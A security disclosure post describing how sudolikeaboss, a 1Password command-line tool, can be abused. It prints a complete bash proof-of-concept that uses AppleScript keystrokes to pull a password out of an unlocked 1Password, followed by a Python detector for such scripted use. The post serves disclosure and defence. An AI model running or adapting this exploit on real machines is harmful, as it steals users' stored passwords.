sudolikeaboss is a neat little program that acts as a command-line interface to
1Password Pro, effectively giving you a way to use 1Password from the terminal.
This is useful, but it does come with a security tradeoff: any application
running in the context of the user can potentially steal passwords while
1Password is in an unlocked state.
This isn't so much of an issue with the official browser extension, as there's no
way for a malicious website to invoke AppleScript or execute arbitrary code.
I don't want to overstate this, as it's a fairly limited exploit: it only works
if 1Password is unlocked and the screen isn't locked, meaning the user will
almost certainly be aware that it's happened. It also requires the attacker to
be able to execute code on the machine in the first place, but a user tricked
into running such a malicious application could potentially have multiple
account passwords stolen. A carefully orchestrated spearphishing attack could
combine this with automated password changes to lock the victim out of their
accounts.
The exploit below demonstrates how sudolikeaboss can be abused using AppleScript
to steal the first result of a quick search for a string within 1Password. Use
a parameter like "gmail" or "twitter" to see how quickly it can steal your
passwords.
https://m4.rkw.sh/sudolikeyoureowned.sh.txt
-------------------------------------------
#!/bin/bash
####################################################
# sudolikeaboss 0.3.0-beta1 password theft exploit #
####################################################
# by m4rkw, shouts to #coolkids :P                 #
####################################################
# sudolikeaboss is very convenient but convenience is often a tradeoff
# for security. This PoC demonstrates password theft when 1password
# is in an unlocked state.
#
# The parameter will be used to search 1password and return the first
# matching result. A good choice would be "twitter" or "gmail".

if [ -z "$1" ] ; then
    echo "Usage: $0 <1password search string>"
    exit 0
fi

# Build an AppleScript that waits briefly for the 1Password prompt, types the
# search string one character at a time, then presses Return (key code 36).
cat > sudo_as.txt <<EOF
delay 0.3
tell application "System Events"
EOF
echo "$1" | fold -w1 | sed 's/^/ keystroke "/g' | sed 's/$/"/g' >> sudo_as.txt
cat >> sudo_as.txt <<EOF
delay 0.5
key code 36
end tell
EOF

# Compile the script and run it in the background, then invoke sudolikeaboss,
# whose 1Password prompt receives the simulated keystrokes and returns the
# first matching item's password on stdout.
osacompile -o sudo_as.scpt sudo_as.txt
osascript "./sudo_as.scpt" &
pass=$(sudolikeaboss)
echo "Password stolen: $pass"
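From the defender's side, the PoC leaves a recognisable trace: a backgrounded osascript run and a sudolikeaboss run by the same user within a second or two of each other. The following detector is an added example, not part of the original post or of sudolikeaboss; the process-execution log format, the user names and the timestamps are constructed sample data, and the five-second window is an assumed tuning value.

```python
"""Heuristic detector for scripted (non-interactive) sudolikeaboss use."""
from datetime import datetime, timedelta

# Constructed process-execution log (sample data, not real telemetry).
# One event per line: "<ISO timestamp> <user> <command line>".
SAMPLE_LOG = """\
2016-03-01T10:00:01 alice osacompile -o sudo_as.scpt sudo_as.txt
2016-03-01T10:00:02 alice osascript ./sudo_as.scpt
2016-03-01T10:00:02 alice sudolikeaboss
2016-03-01T10:05:00 bob sudolikeaboss
2016-03-01T10:09:00 bob osascript backup_notify.scpt
"""

WINDOW = timedelta(seconds=5)  # assumed correlation window


def parse_log(text):
    """Parse log lines into (timestamp, user, argv[0], full command) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, cmd = line.split(" ", 2)
        events.append((datetime.fromisoformat(ts), user, cmd.split()[0], cmd))
    return events


def find_scripted_invocations(events, window=WINDOW):
    """Flag sudolikeaboss runs that have an osascript run by the same user
    within `window`. The PoC above backgrounds osascript (which types the
    search string and presses Return) and then calls sudolikeaboss, so the
    two appear almost simultaneously; an interactive user typing into the
    1Password prompt produces no such osascript process."""
    alerts = []
    osa = [e for e in events if e[2] == "osascript"]
    for ts, user, prog, cmd in events:
        if prog != "sudolikeaboss":
            continue
        related = [o for o in osa if o[1] == user and abs(o[0] - ts) <= window]
        if related:
            alerts.append({"user": user, "time": ts.isoformat(),
                           "osascript": related[0][3]})
    return alerts


if __name__ == "__main__":
    for alert in find_scripted_invocations(parse_log(SAMPLE_LOG)):
        print("possible scripted 1Password access:", alert)
```

Bob's unrelated osascript run four minutes after his sudolikeaboss call stays outside the window and is not flagged; only alice's paired events produce an alert.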